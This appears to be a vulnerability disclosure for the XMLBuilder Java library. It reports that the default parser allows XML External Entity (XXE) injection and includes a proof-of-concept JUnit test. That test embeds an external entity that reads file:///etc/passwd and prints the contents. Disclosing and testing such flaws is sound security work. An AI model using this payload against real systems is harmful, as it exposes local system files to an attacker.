I noticed that, by default, the parser used by XMLBuilder is vulnerable to XML External Entity (XXE) injection.
The following PoC is a modified version of TestXMLBuilder2.java in which the contents of a local file end up in the parser output.
package com.jamesmurty.utils;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
public class TestXMLBuilder2 extends BaseXMLBuilderTests {

    /**
     * Example document whose internal DTD subset declares an external general entity
     * ({@code xx1}) with a {@code file:///etc/passwd} system identifier and references it
     * inside the body, between {@code EXAMPLE_XML_DOC_START} and {@code EXAMPLE_XML_DOC_END}.
     * A parser that resolves external general entities substitutes the file contents for
     * the reference; a hardened parser (DTDs disallowed, or external general entities
     * disabled) should instead reject the document or leave the reference unexpanded.
     */
    public static final String EXAMPLE_XML_DOC2 =
            "<?xml version=\"1.0\"?><!DOCTYPE Projects [ <!ELEMENT JetS3t ANY> <!ENTITY xx1 SYSTEM \"file:///etc/passwd\"> ]>"
            + EXAMPLE_XML_DOC_START
            + "&xx1;"
            + EXAMPLE_XML_DOC_END;

    /** The builder implementation exercised by the inherited test suite. */
    @Override
    public Class<? extends BaseXMLBuilder> XMLBuilderToTest() throws Exception {
        return XMLBuilder2.class;
    }

    /**
     * Tells the base suite that this builder reports failures as unchecked exceptions only
     * (see {@link #testNoCheckedExceptions()}).
     */
    @Override
    protected boolean isRuntimeExceptionsOnly() {
        return true;
    }

    /**
     * Walks the XMLBuilder2 API — create, parse, whitespace stripping, serialisation, an
     * XPath query and an XPath find — from a method with no {@code throws} clause, so any
     * checked exception on these calls would fail compilation.
     * The last line prints the text content of {@code /Projects}; with a parser that
     * resolves external general entities this is where the referenced file's contents
     * appear. There is deliberately no assertion here — the method is a demonstration.
     */
    public void testNoCheckedExceptions() {
        // The created builder is discarded; only the absence of a checked exception matters.
        XMLBuilder2.create("Blah");
        XMLBuilder2 doc = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
        doc.stripWhitespaceOnlyTextNodes();
        doc.asString();
        doc.elementAsString();
        doc.xpathQuery("/*", XPathConstants.NODESET);
        XMLBuilder2 projects = doc.xpathFind("/Projects");
        System.out.println(projects.getElement().getTextContent());
    }

    /**
     * A failing XPath lookup must surface as an {@link XMLBuilderRuntimeException} whose
     * cause is the underlying {@link XPathExpressionException}.
     */
    public void testExceptionWrappedInXMLBuilderRuntimeException() {
        XMLBuilder2 doc = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
        try {
            doc.xpathFind("/BadPath");
            fail("Expected XMLBuilderRuntimeException");
        } catch (XMLBuilderRuntimeException wrapped) {
            assertWrapsXPathFailure(wrapped);
        }
    }

    /**
     * Asserts that {@code wrapped} is exactly the wrapper type (not a subclass) and that
     * its cause is the XPath failure with the expected message fragment.
     */
    private void assertWrapsXPathFailure(XMLBuilderRuntimeException wrapped) {
        assertEquals(XMLBuilderRuntimeException.class, wrapped.getClass());
        Throwable cause = wrapped.getCause();
        assertEquals(XPathExpressionException.class, cause.getClass());
        assertTrue(cause.getMessage().contains("does not resolve to an Element"));
    }
}